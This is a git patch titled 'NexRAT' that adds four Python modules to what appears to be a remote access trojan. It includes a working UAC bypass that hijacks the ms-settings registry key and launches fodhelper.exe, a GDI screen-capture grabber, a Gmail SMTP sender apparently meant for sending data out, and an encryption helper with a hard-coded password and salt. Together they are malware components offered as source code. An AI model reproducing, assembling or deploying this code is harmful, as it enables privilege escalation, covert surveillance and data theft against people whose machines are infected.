From 18a3d3bc354e667bc58385e59745b82b53695139 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:06:25 +0200
Subject: NexRAT

---
 Specific/encrypt.py    |  26 ++++++++++++
 Specific/grabber.py    | 113 +++++++++++++++++++++++++++++++++++++++++++++++++
 Specific/mail.py       |  21 +++++++++
 Specific/uac_bypass.py |  44 +++++++++++++++++++
 4 files changed, 204 insertions(+)
 create mode 100644 Specific/encrypt.py
 create mode 100644 Specific/grabber.py
 create mode 100644 Specific/mail.py
 create mode 100644 Specific/uac_bypass.py

(limited to 'Specific')

diff --git a/Specific/encrypt.py b/Specific/encrypt.py
new file mode 100644
index 0000000..6f88280
--- /dev/null
+++ b/Specific/encrypt.py
@@ -0,0 +1,26 @@
+import base64
+
+from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
+from cryptography.hazmat.backends import default_backend
+from cryptography.hazmat.primitives import hashes
+from cryptography.fernet import Fernet
+
+
+class Encryption:
+  def __init__(self, password='ksxgyRuBRJLKxjFeHD4nmxbE', salt=b'v4CuHZFzmTedBY2EBGrLRXsm'):
+    self.password = password
+    self.salt = salt
+    self.key = Fernet(self.generate_key())
+
+
+  def generate_key(self):
+    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=self.salt, iterations=100000, backend=default_backend())
+    return base64.urlsafe_b64encode(kdf.derive(self.password.encode()))
+
+
+  def do_encrypt(self, message):
+    return self.key.encrypt(message)
+
+
+  def do_decrypt(self, ciphertext):
+    return self.key.decrypt(ciphertext)
\ No newline at end of file
diff --git a/Specific/grabber.py b/Specific/grabber.py
new file mode 100644
index 0000000..badec7c
--- /dev/null
+++ b/Specific/grabber.py
@@ -0,0 +1,113 @@
+from ctypes import Structure, c_int, POINTER, WINFUNCTYPE, windll, WinError, sizeof
+from ctypes.wintypes import BOOL, HWND, RECT, HDC, HBITMAP, HGDIOBJ, DWORD, LONG, WORD, UINT, LPVOID
+import numpy as np
+
+SRCCOPY = 0x00CC0020
+DIB_RGB_COLORS = 0
+BI_RGB = 0
+
+
+class BITMAPINFOHEADER(Structure):
+	_fields_ = [('biSize', DWORD),
+							('biWidth', LONG),
+							('biHeight', LONG),
+							('biPlanes', WORD),
+							('biBitCount', WORD),
+							('biCompression', DWORD),
+							('biSizeImage', DWORD),
+							('biXPelsPerMeter', LONG),
+							('biYPelsPerMeter', LONG),
+							('biClrUsed', DWORD),
+							('biClrImportant', DWORD)]
+
+
+def err_on_zero_or_null_check(result, func, args):
+	if not result:
+		raise WinError()
+	return args
+
+
+def quick_win_define(name, output, *args, **kwargs):
+	dllname, fname = name.split('.')
+	params = kwargs.get('params', None)
+	if params:
+		params = tuple([(x, ) for x in params])
+	func = (WINFUNCTYPE(output, *args))((fname, getattr(windll, dllname)), params)
+	err = kwargs.get('err', err_on_zero_or_null_check)
+	if err:
+		func.errcheck = err
+	return func
+
+
+GetClientRect = quick_win_define('user32.GetClientRect', BOOL, HWND, POINTER(RECT), params=(1, 2))
+GetDC = quick_win_define('user32.GetDC', HDC, HWND)
+CreateCompatibleDC = quick_win_define('gdi32.CreateCompatibleDC', HDC, HDC)
+CreateCompatibleBitmap = quick_win_define('gdi32.CreateCompatibleBitmap', HBITMAP, HDC, c_int, c_int)
+ReleaseDC = quick_win_define('user32.ReleaseDC', c_int, HWND, HDC)
+DeleteDC = quick_win_define('gdi32.DeleteDC', BOOL, HDC)
+DeleteObject = quick_win_define('gdi32.DeleteObject', BOOL, HGDIOBJ)
+SelectObject = quick_win_define('gdi32.SelectObject', HGDIOBJ, HDC, HGDIOBJ)
+BitBlt = quick_win_define('gdi32.BitBlt', BOOL, HDC, c_int, c_int, c_int, c_int, HDC, c_int, c_int, DWORD)
+GetDIBits = quick_win_define('gdi32.GetDIBits', c_int, HDC, HBITMAP, UINT, UINT, LPVOID, POINTER(BITMAPINFOHEADER), UINT)
+GetDesktopWindow = quick_win_define('user32.GetDesktopWindow', HWND)
+
+
+class Grabber(object):
+	def __init__(self, window=None, with_alpha=False, bbox=None):
+		window = window or GetDesktopWindow()
+		self.window = window
+		rect = GetClientRect(window)
+		self.width = rect.right - rect.left
+		self.height = rect.bottom - rect.top
+		if bbox:
+			bbox = [bbox[0], bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]]
+			if not bbox[2] or not bbox[3]:
+				bbox[2] = self.width - bbox[0]
+				bbox[3] = self.height - bbox[1]
+			self.x, self.y, self.width, self.height = bbox
+		else:
+			self.x = 0
+			self.y = 0
+		self.windowDC = GetDC(window)
+		self.memoryDC = CreateCompatibleDC(self.windowDC)
+		self.bitmap = CreateCompatibleBitmap(self.windowDC, self.width, self.height)
+		self.bitmapInfo = BITMAPINFOHEADER()
+		self.bitmapInfo.biSize = sizeof(BITMAPINFOHEADER)
+		self.bitmapInfo.biPlanes = 1
+		self.bitmapInfo.biBitCount = 32 if with_alpha else 24
+		self.bitmapInfo.biWidth = self.width
+		self.bitmapInfo.biHeight = -self.height
+		self.bitmapInfo.biCompression = BI_RGB
+		self.bitmapInfo.biSizeImage = 0
+		self.channels = 4 if with_alpha else 3
+		self.closed = False
+
+
+	def __del__(self):
+		try:
+			self.close()
+		except:
+			pass
+
+
+	def close(self):
+		if self.closed:
+			return
+		ReleaseDC(self.window, self.windowDC)
+		DeleteDC(self.memoryDC)
+		DeleteObject(self.bitmap)
+		self.closed = True
+
+
+	def grab(self, output=None):
+		if self.closed:
+			raise ValueError('Grabber already closed')
+		if output is None:
+			output = np.empty((self.height, self.width, self.channels), dtype='uint8')
+		else:
+			if output.shape != (self.height, self.width, self.channels):
+				raise ValueError('Invalid output dimentions')
+		SelectObject(self.memoryDC, self.bitmap)
+		BitBlt(self.memoryDC, 0, 0, self.width, self.height, self.windowDC, self.x, self.y, SRCCOPY)
+		GetDIBits(self.memoryDC, self.bitmap, 0, self.height, output.ctypes.data, self.bitmapInfo, DIB_RGB_COLORS)
+		return output
\ No newline at end of file
diff --git a/Specific/mail.py b/Specific/mail.py
new file mode 100644
index 0000000..394d5a3
--- /dev/null
+++ b/Specific/mail.py
@@ -0,0 +1,21 @@
+import smtplib
+
+
+class Email:
+  def __init__(self, sender, sender_pw, recievers, subject, text):
+    self.sender = sender
+    self.sender_pw = sender_pw
+    self.recievers = recievers
+    self.subject = subject
+    self.text = text
+
+
+  def send_email(self):
+    message = f'From: {self.sender}\nTo: {", ".join(self.recievers)}\nSubject: {self.subject}\n\n{self.text}'
+
+    server = smtplib.SMTP('smtp.gmail.com', 587)
+    server.ehlo()
+    server.starttls()
+    server.login(self.sender, self.sender_pw)
+    server.sendmail(self.sender, self.recievers, message)
+    server.close()
\ No newline at end of file
diff --git a/Specific/uac_bypass.py b/Specific/uac_bypass.py
new file mode 100644
index 0000000..a8df662
--- /dev/null
+++ b/Specific/uac_bypass.py
@@ -0,0 +1,44 @@
+import winreg
+import ctypes
+import time
+import os
+
+from sys import exit
+
+FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
+REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
+DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
+
+
+def is_running_as_admin(): 
+  try:
+    return ctypes.windll.shell32.IsUserAnAdmin()
+  except:
+    return False
+
+
+def create_reg_key(key, value):
+  try:        
+    winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
+    registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)                
+    winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
+    winreg.CloseKey(registry_key)
+  except WindowsError:        
+    exit(0)
+
+
+def bypass_uac(cmd, timeout=2.5):
+  try:
+    time.sleep(timeout)
+    create_reg_key(DELEGATE_EXEC_REG_KEY, '')
+    create_reg_key(None, cmd)
+  except WindowsError:
+    exit(0)
+
+
+def Bypass(path):
+  try:
+    bypass_uac(path)
+    os.system(FOD_HELPER)
+  except WindowsError:
+    exit(0)
\ No newline at end of file
-- 
cgit v1.2.3